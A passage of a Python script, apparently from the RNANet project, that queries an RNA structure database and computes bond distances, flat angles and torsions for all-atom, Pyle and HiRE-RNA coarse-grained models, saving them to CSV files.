"tHW_UU_tips_distance":3, "tHW_UU_C1'-B1-B1pair":3, "tHW_UU_B1-B1pair-C1'pair":2, "tHW_UU_C4'-C1'-B1-B1pair":2, "tHW_UU_B1-B1pair-C1'pair-C4'pair":2, "tHW_UU_alpha_1":2, "tHW_UU_alpha_2":3, "tHW_UU_dB1":2, "tHW_UU_dB2":2,
"cWS_UU_tips_distance":5, "cWS_UU_C1'-B1-B1pair":1, "cWS_UU_B1-B1pair-C1'pair":1, "cWS_UU_C4'-C1'-B1-B1pair":2, "cWS_UU_B1-B1pair-C1'pair-C4'pair":3, "cWS_UU_alpha_1":2, "cWS_UU_alpha_2":1, "cWS_UU_dB1":2, "cWS_UU_dB2":1,
"tWS_UU_tips_distance":3, "tWS_UU_C1'-B1-B1pair":2, "tWS_UU_B1-B1pair-C1'pair":2, "tWS_UU_C4'-C1'-B1-B1pair":3, "tWS_UU_B1-B1pair-C1'pair-C4'pair":2, "tWS_UU_alpha_1":2, "tWS_UU_alpha_2":2, "tWS_UU_dB1":3, "tWS_UU_dB2":3,
"cSW_UU_tips_distance":5, "cSW_UU_C1'-B1-B1pair":1, "cSW_UU_B1-B1pair-C1'pair":3, "cSW_UU_C4'-C1'-B1-B1pair":2, "cSW_UU_B1-B1pair-C1'pair-C4'pair":3, "cSW_UU_alpha_1":2, "cSW_UU_alpha_2":3, "cSW_UU_dB1":1, "cSW_UU_dB2":4,
"tSW_UU_tips_distance":6, "tSW_UU_C1'-B1-B1pair":3, "tSW_UU_B1-B1pair-C1'pair":1, "tSW_UU_C4'-C1'-B1-B1pair":2, "tSW_UU_B1-B1pair-C1'pair-C4'pair":2, "tSW_UU_alpha_1":1, "tSW_UU_alpha_2":2, "tSW_UU_dB1":3, "tSW_UU_dB2":3,
"cHH_UU_tips_distance":5, "cHH_UU_C1'-B1-B1pair":1, "cHH_UU_B1-B1pair-C1'pair":1, "cHH_UU_C4'-C1'-B1-B1pair":3, "cHH_UU_B1-B1pair-C1'pair-C4'pair":2, "cHH_UU_alpha_1":2, "cHH_UU_alpha_2":2, "cHH_UU_dB1":1, "cHH_UU_dB2":5,
"tHH_UU_tips_distance":5, "tHH_UU_C1'-B1-B1pair":2, "tHH_UU_B1-B1pair-C1'pair":3, "tHH_UU_C4'-C1'-B1-B1pair":1, "tHH_UU_B1-B1pair-C1'pair-C4'pair":3, "tHH_UU_alpha_1":2, "tHH_UU_alpha_2":4, "tHH_UU_dB1":4, "tHH_UU_dB2":5,
"cSH_UU_tips_distance":5, "cSH_UU_C1'-B1-B1pair":1, "cSH_UU_B1-B1pair-C1'pair":3, "cSH_UU_C4'-C1'-B1-B1pair":2, "cSH_UU_B1-B1pair-C1'pair-C4'pair":2, "cSH_UU_alpha_1":3, "cSH_UU_alpha_2":2, "cSH_UU_dB1":2, "cSH_UU_dB2":5,
"tSH_UU_tips_distance":5, "tSH_UU_C1'-B1-B1pair":2, "tSH_UU_B1-B1pair-C1'pair":1, "tSH_UU_C4'-C1'-B1-B1pair":3, "tSH_UU_B1-B1pair-C1'pair-C4'pair":3, "tSH_UU_alpha_1":1, "tSH_UU_alpha_2":1, "tSH_UU_dB1":1, "tSH_UU_dB2":5,
"cHS_UU_tips_distance":7, "cHS_UU_C1'-B1-B1pair":2, "cHS_UU_B1-B1pair-C1'pair":2, "cHS_UU_C4'-C1'-B1-B1pair":2, "cHS_UU_B1-B1pair-C1'pair-C4'pair":2, "cHS_UU_alpha_1":2, "cHS_UU_alpha_2":2, "cHS_UU_dB1":3, "cHS_UU_dB2":2,
"tHS_UU_tips_distance":5, "tHS_UU_C1'-B1-B1pair":1, "tHS_UU_B1-B1pair-C1'pair":2, "tHS_UU_C4'-C1'-B1-B1pair":2, "tHS_UU_B1-B1pair-C1'pair-C4'pair":1, "tHS_UU_alpha_1":1, "tHS_UU_alpha_2":2, "tHS_UU_dB1":4, "tHS_UU_dB2":1,
"cSS_UU_tips_distance":5, "cSS_UU_C1'-B1-B1pair":2, "cSS_UU_B1-B1pair-C1'pair":2, "cSS_UU_C4'-C1'-B1-B1pair":2, "cSS_UU_B1-B1pair-C1'pair-C4'pair":3, "cSS_UU_alpha_1":2, "cSS_UU_alpha_2":2, "cSS_UU_dB1":6, "cSS_UU_dB2":4,
"tSS_UU_tips_distance":8, "tSS_UU_C1'-B1-B1pair":1, "tSS_UU_B1-B1pair-C1'pair":1, "tSS_UU_C4'-C1'-B1-B1pair":2, "tSS_UU_B1-B1pair-C1'pair-C4'pair":1, "tSS_UU_alpha_1":1, "tSS_UU_alpha_2":2, "tSS_UU_dB1":3, "tSS_UU_dB2":4,
}
@trace_unhandled_exceptions
def retrieve_angles(db, res):
    """
    Retrieve torsion angles from RNANet.db and convert them to degrees.

    Parameters:
        db  : database identifier. NOTE(review): currently unused — the
              connection below always opens runDir + "/results/RNANet.db";
              confirm whether `db` was meant to select the file.
        res : maximum structure resolution (Angstroms) used to filter chains.

    Returns:
        A pandas DataFrame with chain_id, nt_name and the torsion angles
        alpha..chi converted from radians to degrees.
    """
    # Retrieve angle values (only standard nucleotides of unmapped chains
    # of structures at sufficient resolution and without issues)
    with sqlite3.connect(runDir + "/results/RNANet.db") as conn:
        conn.execute('pragma journal_mode=wal')
        df = pd.read_sql(f"""SELECT chain_id, nt_name, alpha, beta, gamma, delta, epsilon, zeta, chi
                             FROM (
                                 SELECT chain_id FROM chain JOIN structure ON chain.structure_id = structure.pdb_id
                                 WHERE chain.rfam_acc = 'unmappd' AND structure.resolution <= {res} AND issue = 0
                             ) AS c NATURAL JOIN nucleotide
                             WHERE nt_name='A' OR nt_name='C' OR nt_name='G' OR nt_name='U';""", conn)

    # convert to degrees, mapping values to ]-180, 180]
    # (assumes angles are stored in radians within [0, 2*pi] — TODO confirm)
    j = (180.0/np.pi)
    torsions = df.iloc[:, 0:2].merge(
        df.iloc[:, 2:9].applymap(lambda x: j*x if x <= np.pi else j*x-360.0, na_action='ignore'),
        left_index=True, right_index=True
    )
    return torsions
def retrieve_eta_theta(db, res):
    """
    Retrieve pseudotorsions from RNANet.db and convert them to degrees.

    Parameters:
        db  : database identifier. NOTE(review): currently unused — the
              connection below always opens runDir + "/results/RNANet.db";
              confirm intended (same pattern as retrieve_angles).
        res : maximum structure resolution (Angstroms) used to filter chains.

    Returns:
        A pandas DataFrame with chain_id, nt_name and the six pseudotorsion
        angles (eta/theta and their prime/base variants) in degrees.
    """
    # Retrieve angle values
    with sqlite3.connect(runDir + "/results/RNANet.db") as conn:
        conn.execute('pragma journal_mode=wal')
        df = pd.read_sql(f"""SELECT chain_id, nt_name, eta, theta, eta_prime, theta_prime, eta_base, theta_base
                             FROM (
                                 SELECT chain_id FROM chain JOIN structure ON chain.structure_id = structure.pdb_id
                                 WHERE chain.rfam_acc = 'unmappd' AND structure.resolution <= {res} AND issue = 0
                             ) AS c NATURAL JOIN nucleotide
                             WHERE nt_name='A' OR nt_name='C' OR nt_name='G' OR nt_name='U';""", conn)

    # convert to degrees, mapping values to ]-180, 180]
    # (assumes angles are stored in radians within [0, 2*pi] — TODO confirm)
    j = (180.0/np.pi)
    pseudotorsions = df.iloc[:, 0:2].merge(
        df.iloc[:, 2:8].applymap(lambda x: j*x if x <= np.pi else j*x-360.0, na_action='ignore'),
        left_index=True, right_index=True
    )
    return pseudotorsions
def get_euclidian_distance(L1, L2):
    """
    Compute the Euclidean distance between two points.

    Each point is a list of coordinates, possibly wrapped in a singleton
    list ([[x, y, z]]) as produced by the atom-extraction comprehensions;
    one level of wrapping is removed first. Returns NaN when either
    argument is empty. Mismatched lengths or non-numeric coordinates are
    reported on stdout and that axis is skipped.
    """
    if not len(L1) or not len(L2):
        return np.nan
    # Unwrap one level of nesting: [[x, y, z]] -> [x, y, z]
    if len(L1) == 1:
        L1 = L1[0]
    if len(L2) == 1:
        L2 = L2[0]
    acc = 0
    for idx in range(len(L1)):
        try:
            acc += float(L1[idx] - L2[idx])**2
        except (TypeError, IndexError):
            # bad or missing term on this axis: report it and carry on
            print("Terms: ", L1, L2)
    return np.sqrt(acc)
def get_flat_angle(L1, L2, L3):
    """
    Compute the planar angle, in degrees, defined by three points.

    L1, L2, L3: singleton lists each wrapping one (x, y, z) coordinate;
    L2 is the vertex of the angle. Returns NaN if any list is empty.
    """
    if not (len(L1) and len(L2) and len(L3)):
        return np.nan
    vertices = (Vector(L1[0]), Vector(L2[0]), Vector(L3[0]))
    return calc_angle(*vertices) * (180 / np.pi)
def get_torsion_angle(L1, L2, L3, L4):
    """
    Compute the dihedral (torsion) angle, in degrees, defined by four
    points, each given as a singleton list wrapping one (x, y, z)
    coordinate. Returns NaN if any of the four lists is empty.
    """
    for point in (L1, L2, L3, L4):
        if not len(point):
            return np.nan
    radians = calc_dihedral(Vector(L1[0]), Vector(L2[0]), Vector(L3[0]), Vector(L4[0]))
    return radians * (180 / np.pi)
def pos_b1(res):
    """
    Return the coordinates of virtual atom B1 (the center of the first
    aromatic cycle of the base).

    Parameters:
        res : a residue object exposing get_resname() and iteration over
              atoms (each atom exposing get_fullname() and get_vector()).

    Returns:
        [[x, y, z]] (a singleton list, matching the shape of the other
        atom-coordinate lists used in this file), or [] when the residue
        is not a recognized base or none of its ring atoms are present.
    """

    def _ring_center(atom_names):
        # Average the coordinates of the residue's atoms whose full name is
        # exactly one of atom_names. Returns [x, y, z], or [] if none matched.
        count = 0
        sum_x = sum_y = sum_z = 0.0
        for atom in res:
            if atom.get_fullname() in atom_names:
                count += 1
                coord = atom.get_vector()
                sum_x += coord[0]
                sum_y += coord[1]
                sum_z += coord[2]
        if count == 0:
            return []
        return [sum_x / count, sum_y / count, sum_z / count]

    # Purine-like residues have 2 aromatic cycles: B1 is the center of the
    # five-membered (imidazole) ring.
    if res.get_resname() in ['A', 'G', '2MG', '7MG', 'MA6', '6IA', 'OMG' , '2MA', 'B9B', 'A2M', '1MA', 'E7G', 'P7G', 'B8W', 'B8K', 'BGH', '6MZ', 'E6G', 'MHG', 'M7A', 'M2G', 'P5P', 'G7M', '1MG', 'T6A', 'MIA', 'YG', 'YYG', 'I', 'DG', 'N79', '574', 'DJF', 'AET', '12A', 'ANZ', 'UY4'] :
        center = _ring_center(['N9', 'C8', 'N7', 'C4', 'C5'])
        if center:
            return [center]

    # Pyrimidine-like residues have only one (six-membered) cycle.
    if res.get_resname() in ['C', 'U', 'AG9', '70U', '1RN', 'RSP', '3AU', 'CM0', 'U8U', 'IU', 'E3C', '4SU', '5HM', 'LV2', 'LHH', '4AC', 'CH', 'Y5P', '2MU', '4OC', 'B8T', 'JMH', 'JMC', 'DC', 'B9H', 'UR3', 'I4U', 'B8Q', 'P4U', 'OMU', 'OMC', '5MU', 'H2U', 'CBV', 'M1Y', 'B8N', '3TD', 'B8H'] :
        center = _ring_center(['C6', 'N3', 'N1', 'C2', 'C4', 'C5'])
        if center:
            return [center]

    return []
def pos_b2(res):
    """
    Return the coordinates of virtual atom B2 (the center of the second
    aromatic cycle, which only exists for purine-like bases).

    Parameters:
        res : a residue object exposing get_resname() and iteration over
              atoms (each atom exposing get_fullname() and get_vector()).

    Returns:
        [[x, y, z]] (singleton list), or [] when the residue has no second
        cycle or none of its six-membered-ring atoms are present.
    """
    # Only purine-like residues (2 aromatic cycles) define a B2 atom;
    # B2 is the center of the six-membered ring of the purine.
    if res.get_resname() not in ['A', 'G', '2MG', '7MG', 'MA6', '6IA', 'OMG' , '2MA', 'B9B', 'A2M', '1MA', 'E7G', 'P7G', 'B8W', 'B8K', 'BGH', '6MZ', 'E6G', 'MHG', 'M7A', 'M2G', 'P5P', 'G7M', '1MG', 'T6A', 'MIA', 'YG', 'YYG', 'I', 'DG', 'N79', '574', 'DJF', 'AET', '12A', 'ANZ', 'UY4'] :
        return []

    count = 0
    sum_x = sum_y = sum_z = 0.0
    for atom in res:
        if atom.get_fullname() in ['C6', 'N3', 'N1', 'C2', 'C4', 'C5'] :
            count += 1
            coord = atom.get_vector()
            sum_x += coord[0]
            sum_y += coord[1]
            sum_z += coord[2]
    if count == 0:
        return []
    return [[sum_x / count, sum_y / count, sum_z / count]]
@trace_unhandled_exceptions
def measures_aa(name, s, thr_idx):
    """
    Measures the distance between atoms linked by covalent bonds.

    Processes every standard nucleotide (A, C, G, U) of the first chain of
    structure `s` and saves the covalent-bond distances to
    results/geometry/all-atoms/distances/dist_atoms_{name}.csv.

    Parameters:
        name    : chain/file identifier, used to build the output CSV name
        s       : parsed structure; only the first chain of the first model
                  is measured (1 chain per file)
        thr_idx : worker index, used to position the tqdm progress bar
    """
    # do not recompute something already computed
    if os.path.isfile(runDir + "/results/geometry/all-atoms/distances/dist_atoms_" + name + ".csv"):
        return

    last_o3p = []  # O3' of the previous nucleotide, linked to the P of the current nucleotide
    l_common = []       # bond distances common to all nucleotides (backbone + ribose)
    l_purines = []      # bond distances specific to purine rings (A, G)
    l_pyrimidines = []  # bond distances specific to pyrimidine rings (C, U)

    setproctitle(f"RNANet statistics.py Worker {thr_idx+1} measure_aa_dists({name})")

    chain = next(s[0].get_chains())  # 1 chain per file
    residues = list(chain.get_residues())
    pbar = tqdm(total=len(residues), position=thr_idx+1, desc=f"Worker {thr_idx+1}: {name} measure_aa_dists", unit="res", leave=False)
    pbar.update(0)
    for res in chain :
        # Placeholders for the measures, filled only for residues A, G, C, U.
        # Backbone/ribose distances (common to the four nucleotides):
        op3_p = []
        p_op1 = []
        p_op2 = []
        p_o5p = []
        o5p_c5p = []
        c5p_c4p = []
        c4p_o4p = []
        o4p_c1p = []
        c1p_c2p = []
        c2p_o2p = []
        c2p_c3p = []
        c3p_o3p = []
        c4p_c3p = []

        # if res = A or G
        c1p_n9 = None
        n9_c8 = None
        c8_n7 = None
        n7_c5 = None
        c5_c6 = None
        c6_n1 = None
        n1_c2 = None
        c2_n3 = None
        n3_c4 = None
        c4_n9 = None
        c4_c5 = None
        # if res = G
        c6_o6 = None
        c2_n2 = None
        # if res = A
        c6_n6 = None
        # if res = C or U
        c1p_n1 = None
        n1_c6 = None
        c6_c5 = None
        c5_c4 = None
        c4_n3 = None
        n3_c2 = None
        c2_n1 = None
        c2_o2 = None
        # if res = C
        c4_n4 = None
        # if res = U
        c4_o4 = None
        last_o3p_p = None

        if res.get_resname()=='A' or res.get_resname()=='G' or res.get_resname()=='C' or res.get_resname()=='U' :
            # get the coordinates of the atoms
            # (each list is empty or holds one coordinate; get_euclidian_distance
            # returns NaN when a list is empty)
            atom_p = [ atom.get_coord() for atom in res if atom.get_name() == "P"]
            atom_op3 = [ atom.get_coord() for atom in res if "OP3" in atom.get_fullname() ] # OP3 belongs to previous nucleotide !
            atom_op1 = [ atom.get_coord() for atom in res if "OP1" in atom.get_fullname() ]
            atom_op2 = [ atom.get_coord() for atom in res if "OP2" in atom.get_fullname() ]
            atom_o5p= [ atom.get_coord() for atom in res if "O5'" in atom.get_fullname() ]
            atom_c5p = [ atom.get_coord() for atom in res if "C5'" in atom.get_fullname() ]
            atom_c4p = [ atom.get_coord() for atom in res if "C4'" in atom.get_fullname() ]
            atom_o4p = [ atom.get_coord() for atom in res if "O4'" in atom.get_fullname() ]
            atom_c3p = [ atom.get_coord() for atom in res if "C3'" in atom.get_fullname() ]
            atom_o3p = [ atom.get_coord() for atom in res if "O3'" in atom.get_fullname() ]
            atom_c2p = [ atom.get_coord() for atom in res if "C2'" in atom.get_fullname() ]
            atom_o2p = [ atom.get_coord() for atom in res if "O2'" in atom.get_fullname() ]
            atom_c1p = [ atom.get_coord() for atom in res if "C1'" in atom.get_fullname() ]
            atom_n9 = [ atom.get_coord() for atom in res if "N9" in atom.get_fullname() ]
            atom_c8 = [ atom.get_coord() for atom in res if "C8" in atom.get_fullname() ]
            atom_n7 = [ atom.get_coord() for atom in res if "N7" in atom.get_fullname() ]
            # exact name matches below avoid confusing base atoms (C5, C2, ...)
            # with the primed ribose atoms (C5', C2', ...)
            atom_c5 = [ atom.get_coord() for atom in res if atom.get_name() == "C5"]
            atom_c6 = [ atom.get_coord() for atom in res if "C6" in atom.get_fullname() ]
            atom_o6 = [ atom.get_coord() for atom in res if "O6" in atom.get_fullname() ]
            atom_n6 = [ atom.get_coord() for atom in res if "N6" in atom.get_fullname() ]
            atom_n1 = [ atom.get_coord() for atom in res if "N1" in atom.get_fullname() ]
            atom_c2 = [ atom.get_coord() for atom in res if atom.get_name() == "C2"]
            atom_n2 = [ atom.get_coord() for atom in res if "N2" in atom.get_fullname() ]
            atom_o2 = [ atom.get_coord() for atom in res if atom.get_name() == "O2"]
            atom_n3 = [ atom.get_coord() for atom in res if "N3" in atom.get_fullname() ]
            atom_c4 = [ atom.get_coord() for atom in res if atom.get_name() == "C4" ]
            atom_n4 = [ atom.get_coord() for atom in res if "N4" in atom.get_fullname() ]
            atom_o4 = [ atom.get_coord() for atom in res if atom.get_name() == "O4"]

            if len(atom_op3):
                last_o3p_p = get_euclidian_distance(atom_op3, atom_p) # This nucleotide has an OP3 atom (likely the begining of a chain)
            else:
                last_o3p_p = get_euclidian_distance(last_o3p, atom_p) # link with the previous nucleotide

            p_op1 = get_euclidian_distance(atom_op1, atom_p)
            p_op2 = get_euclidian_distance(atom_op2, atom_p)
            p_o5p = get_euclidian_distance(atom_o5p, atom_p)
            o5p_c5p = get_euclidian_distance(atom_o5p, atom_c5p)
            c5p_c4p = get_euclidian_distance(atom_c5p, atom_c4p)
            c4p_o4p = get_euclidian_distance(atom_c4p, atom_o4p)
            c4p_c3p = get_euclidian_distance(atom_c4p, atom_c3p)
            o4p_c1p = get_euclidian_distance(atom_o4p, atom_c1p)
            c1p_c2p = get_euclidian_distance(atom_c1p, atom_c2p)
            c2p_o2p = get_euclidian_distance(atom_c2p, atom_o2p)
            c2p_c3p = get_euclidian_distance(atom_c2p, atom_c3p)
            c3p_o3p = get_euclidian_distance(atom_c3p, atom_o3p)

            last_o3p = atom_o3p # o3' of this residue becomes the previous o3' of the following

            # different cases for the aromatic cycles
            if res.get_resname()=='A' or res.get_resname()=='G':
                # compute the distances between atoms of aromatic cycles
                c1p_n9 = get_euclidian_distance(atom_c1p, atom_n9)
                n9_c8 = get_euclidian_distance(atom_n9, atom_c8)
                c8_n7 = get_euclidian_distance(atom_c8, atom_n7)
                n7_c5 = get_euclidian_distance(atom_n7, atom_c5)
                c5_c6 = get_euclidian_distance(atom_c5, atom_c6)
                c6_o6 = get_euclidian_distance(atom_c6, atom_o6)
                c6_n6 = get_euclidian_distance(atom_c6, atom_n6)
                c6_n1 = get_euclidian_distance(atom_c6, atom_n1)
                n1_c2 = get_euclidian_distance(atom_n1, atom_c2)
                c2_n2 = get_euclidian_distance(atom_c2, atom_n2)
                c2_n3 = get_euclidian_distance(atom_c2, atom_n3)
                n3_c4 = get_euclidian_distance(atom_n3, atom_c4)
                c4_n9 = get_euclidian_distance(atom_c4, atom_n9)
                c4_c5 = get_euclidian_distance(atom_c4, atom_c5)
            if res.get_resname()=='C' or res.get_resname()=='U' :
                c1p_n1 = get_euclidian_distance(atom_c1p, atom_n1)
                n1_c6 = get_euclidian_distance(atom_n1, atom_c6)
                c6_c5 = get_euclidian_distance(atom_c6, atom_c5)
                c5_c4 = get_euclidian_distance(atom_c5, atom_c4)
                c4_n3 = get_euclidian_distance(atom_c4, atom_n3)
                n3_c2 = get_euclidian_distance(atom_n3, atom_c2)
                c2_o2 = get_euclidian_distance(atom_c2, atom_o2)
                c2_n1 = get_euclidian_distance(atom_c2, atom_n1)
                c4_n4 = get_euclidian_distance(atom_c4, atom_n4)
                c4_o4 = get_euclidian_distance(atom_c4, atom_o4)

            # one row per measured residue in each table; the purine and
            # pyrimidine rows keep None for the measures of the other family
            l_common.append([res.get_resname(), last_o3p_p, p_op1, p_op2, p_o5p, o5p_c5p, c5p_c4p, c4p_o4p, c4p_c3p, o4p_c1p, c1p_c2p, c2p_o2p, c2p_c3p, c3p_o3p] )
            l_purines.append([c1p_n9, n9_c8, c8_n7, n7_c5, c5_c6, c6_o6, c6_n6, c6_n1, n1_c2, c2_n2, c2_n3, n3_c4, c4_n9, c4_c5])
            l_pyrimidines.append([c1p_n1, n1_c6, c6_c5, c5_c4, c4_n3, n3_c2, c2_o2, c2_n1, c4_n4, c4_o4])
        pbar.update(1)

    df_comm = pd.DataFrame(l_common, columns=["Residue", "O3'-P", "P-OP1", "P-OP2", "P-O5'", "O5'-C5'", "C5'-C4'", "C4'-O4'", "C4'-C3'", "O4'-C1'", "C1'-C2'", "C2'-O2'", "C2'-C3'", "C3'-O3'"])
    df_pur = pd.DataFrame(l_purines, columns=["C1'-N9", "N9-C8", "C8-N7", "N7-C5", "C5-C6", "C6-O6", "C6-N6", "C6-N1", "N1-C2", "C2-N2", "C2-N3", "N3-C4", "C4-N9", "C4-C5" ])
    df_pyr = pd.DataFrame(l_pyrimidines, columns=["C1'-N1", "N1-C6", "C6-C5", "C5-C4", "C4-N3", "N3-C2", "C2-O2", "C2-N1", "C4-N4", "C4-O4"])
    df = pd.concat([df_comm, df_pur, df_pyr], axis = 1)
    pbar.close()

    df.to_csv(runDir + "/results/geometry/all-atoms/distances/dist_atoms_" + name + ".csv")
@trace_unhandled_exceptions
def measures_pyle(name, s, thr_idx):
    """
    Measures the distances and plane angles involving C1' and P atoms
    (the Pyle coarse-grained model) and saves the results in two CSV files.

    Parameters:
        name    : chain/file identifier, used to build the output CSV names
        s       : parsed structure; only the first chain of the first model
                  is measured
        thr_idx : worker index, used to position the tqdm progress bar
    """
    # do not recompute something already computed
    if (os.path.isfile(runDir + '/results/geometry/Pyle/angles/flat_angles_pyle_' + name + '.csv') and
        os.path.isfile(runDir + "/results/geometry/Pyle/distances/distances_pyle_" + name + ".csv")):
        return

    l_dist = []   # per-residue distances [resname, C1'-P, P-C1', C4'-P, P-C4']
    l_angl = []   # per-residue flat angles [resname, P-C1'-P°, C1'-P°-C1'°]
    last_p = []   # P of the previous residue
    last_c1p = [] # C1' of the previous residue
    last_c4p = [] # C4' of the previous residue

    setproctitle(f"RNANet statistics.py Worker {thr_idx+1} measures_pyle({name})")

    chain = next(s[0].get_chains())
    for res in tqdm(chain, position=thr_idx+1, desc=f"Worker {thr_idx+1}: {name} measures_pyle", unit="res", leave=False):
        p_c1p_psuiv = np.nan
        c1p_psuiv_c1psuiv = np.nan
        # skip ligands that carry several phosphate groups
        if res.get_resname() not in ['ATP', 'CCC', 'A3P', 'A23', 'GDP', 'RIA', "2BA"] :
            atom_p = [ atom.get_coord() for atom in res if atom.get_name() == "P"]
            atom_c1p = [ atom.get_coord() for atom in res if "C1'" in atom.get_fullname() ]
            atom_c4p = [ atom.get_coord() for atom in res if "C4'" in atom.get_fullname() ]
            if len(atom_c1p) > 1:
                # debug output: a residue is not expected to have several C1' atoms
                for atom in res:
                    if "C1'" in atom.get_fullname():
                        print("\n", atom.get_fullname(), "-", res.get_resname(), "\n")

            # angles/distances involving the previous residue; the helpers
            # return NaN when one of the coordinate lists is empty
            p_c1p_psuiv = get_flat_angle(last_p, last_c1p, atom_p)
            c1p_psuiv_c1psuiv = get_flat_angle(last_c1p, atom_p, atom_c1p)
            c1p_psuiv = get_euclidian_distance(last_c1p, atom_p)
            p_c1p = get_euclidian_distance(atom_p, atom_c1p)
            c4p_psuiv = get_euclidian_distance(last_c4p, atom_p)
            p_c4p = get_euclidian_distance(atom_p, atom_c4p)

            # current residue becomes the "previous" one for the next iteration
            last_p = atom_p
            last_c1p = atom_c1p
            last_c4p = atom_c4p

            l_dist.append([res.get_resname(), c1p_psuiv, p_c1p, c4p_psuiv, p_c4p])
            l_angl.append([res.get_resname(), p_c1p_psuiv, c1p_psuiv_c1psuiv])

    df = pd.DataFrame(l_dist, columns=["Residue", "C1'-P", "P-C1'", "C4'-P", "P-C4'"])
    df.to_csv(runDir + "/results/geometry/Pyle/distances/distances_pyle_" + name + ".csv")
    df = pd.DataFrame(l_angl, columns=["Residue", "P-C1'-P°", "C1'-P°-C1'°"])
    df.to_csv(runDir + "/results/geometry/Pyle/angles/flat_angles_pyle_"+name+".csv")
@trace_unhandled_exceptions
def measures_hrna(name, s, thr_idx):
    """
    Measures the distance/angles between the atoms of the HiRE-RNA model
    linked by covalent bonds, and saves three CSV files (distances, flat
    angles, torsions) under results/geometry/HiRE-RNA/.

    Parameters:
        name    : chain/file identifier, used to build the output CSV names
        s       : parsed structure; only the first chain of the first model
                  is measured
        thr_idx : worker index, used to position the tqdm progress bar
    """
    # do not recompute something already computed
    if (os.path.isfile(runDir + '/results/geometry/HiRE-RNA/distances/distances_HiRERNA '+name+'.csv') and
        os.path.isfile(runDir + '/results/geometry/HiRE-RNA/angles/angles_HiRERNA '+name+'.csv') and
        os.path.isfile(runDir + '/results/geometry/HiRE-RNA/torsions/torsions_HiRERNA '+name+'.csv')):
        return

    l_dist = []
    l_angl = []
    l_tors = []
    # coordinates of the previous residue's beads ("psuiv"/"°" measures)
    last_c4p = []
    last_c5p = []
    last_c1p = []
    last_o5p = []

    setproctitle(f"RNANet statistics.py Worker {thr_idx+1} measures_hrna({name})")

    chain = next(s[0].get_chains())
    residues=list(chain.get_residues())
    for res in tqdm(chain, position=thr_idx+1, desc=f"Worker {thr_idx+1}: {name} measures_hrna", unit="res", leave=False):
        # distances
        p_o5p = None
        o5p_c5p = None
        c5p_c4p = None
        c4p_c1p = None
        c1p_b1 = None
        b1_b2 = None
        last_c4p_p = np.nan

        # angles
        p_o5p_c5p = None
        o5p_c5p_c4p = None
        c5p_c4p_c1p = None
        c4p_c1p_b1 = None
        c1p_b1_b2 = None
        lastc4p_p_o5p = None
        lastc5p_lastc4p_p = None
        lastc1p_lastc4p_p = None

        # torsions
        p_o5_c5_c4 = np.nan
        o5_c5_c4_c1 = np.nan
        c5_c4_c1_b1 = np.nan
        c4_c1_b1_b2 = np.nan
        o5_c5_c4_psuiv = np.nan
        c5_c4_psuiv_o5suiv = np.nan
        c4_psuiv_o5suiv_c5suiv = np.nan
        c1_c4_psuiv_o5suiv = np.nan

        if res.get_resname() not in ['ATP', 'CCC', 'A3P', 'A23', 'GDP', 'RIA', "2BA"] : # several phosphate groups, ignore
            atom_p = [ atom.get_coord() for atom in res if atom.get_name() == "P"]
            atom_o5p = [ atom.get_coord() for atom in res if "O5'" in atom.get_fullname() ]
            atom_c5p = [ atom.get_coord() for atom in res if "C5'" in atom.get_fullname() ]
            atom_c4p = [ atom.get_coord() for atom in res if "C4'" in atom.get_fullname() ]
            atom_c1p = [ atom.get_coord() for atom in res if "C1'" in atom.get_fullname() ]
            atom_b1 = pos_b1(res) # position b1 to be calculated, depending on the case
            atom_b2 = pos_b2(res) # position b2 to be calculated only for those with 2 cycles

            # Distances. If one of the atoms is empty, the euclidian distance returns NaN.
            last_c4p_p = get_euclidian_distance(last_c4p, atom_p)
            p_o5p = get_euclidian_distance(atom_p, atom_o5p)
            o5p_c5p = get_euclidian_distance(atom_o5p, atom_c5p)
            c5p_c4p = get_euclidian_distance(atom_c5p, atom_c4p)
            c4p_c1p = get_euclidian_distance(atom_c4p, atom_c1p)
            c1p_b1 = get_euclidian_distance(atom_c1p, atom_b1)
            b1_b2 = get_euclidian_distance(atom_b1, atom_b2)

            # flat angles. Same.
            lastc4p_p_o5p = get_flat_angle(last_c4p, atom_p, atom_o5p)
            lastc1p_lastc4p_p = get_flat_angle(last_c1p, last_c4p, atom_p)
            lastc5p_lastc4p_p = get_flat_angle(last_c5p, last_c4p, atom_p)
            p_o5p_c5p = get_flat_angle(atom_p, atom_o5p, atom_c5p)
            o5p_c5p_c4p = get_flat_angle(atom_o5p, atom_c5p, atom_c4p)
            c5p_c4p_c1p = get_flat_angle(atom_c5p, atom_c4p, atom_c1p)
            c4p_c1p_b1 = get_flat_angle(atom_c4p, atom_c1p, atom_b1)
            c1p_b1_b2 = get_flat_angle(atom_c1p, atom_b1, atom_b2)

            # torsions. Idem.
            p_o5_c5_c4 = get_torsion_angle(atom_p, atom_o5p, atom_c5p, atom_c4p)
            o5_c5_c4_c1 = get_torsion_angle(atom_o5p, atom_c5p, atom_c4p, atom_c1p)
            c5_c4_c1_b1 = get_torsion_angle(atom_c5p, atom_c4p, atom_c1p, atom_b1)
            c4_c1_b1_b2 = get_torsion_angle(atom_c4p, atom_c1p, atom_b1, atom_b2)
            o5_c5_c4_psuiv = get_torsion_angle(last_o5p, last_c5p, last_c4p, atom_p)
            c5_c4_psuiv_o5suiv = get_torsion_angle(last_c5p, last_c4p, atom_p, atom_o5p)
            c4_psuiv_o5suiv_c5suiv = get_torsion_angle(last_c4p, atom_p, atom_o5p, atom_c5p)
            c1_c4_psuiv_o5suiv = get_torsion_angle(last_c1p, last_c4p, atom_p, atom_o5p)

            # current residue becomes the "previous" one for the next iteration
            last_c4p = atom_c4p
            last_c5p = atom_c5p
            last_c1p = atom_c1p
            last_o5p = atom_o5p

            l_dist.append([res.get_resname(), last_c4p_p, p_o5p, o5p_c5p, c5p_c4p, c4p_c1p, c1p_b1, b1_b2])
            l_angl.append([res.get_resname(), lastc4p_p_o5p, lastc1p_lastc4p_p, lastc5p_lastc4p_p, p_o5p_c5p, o5p_c5p_c4p, c5p_c4p_c1p, c4p_c1p_b1, c1p_b1_b2])
            l_tors.append([res.get_resname(), p_o5_c5_c4, o5_c5_c4_c1, c5_c4_c1_b1, c4_c1_b1_b2, o5_c5_c4_psuiv, c5_c4_psuiv_o5suiv, c4_psuiv_o5suiv_c5suiv, c1_c4_psuiv_o5suiv])

    df = pd.DataFrame(l_dist, columns=["Residue", "C4'-P", "P-O5'", "O5'-C5'", "C5'-C4'", "C4'-C1'", "C1'-B1", "B1-B2"])
    df.to_csv(runDir + '/results/geometry/HiRE-RNA/distances/distances_HiRERNA '+name+'.csv')
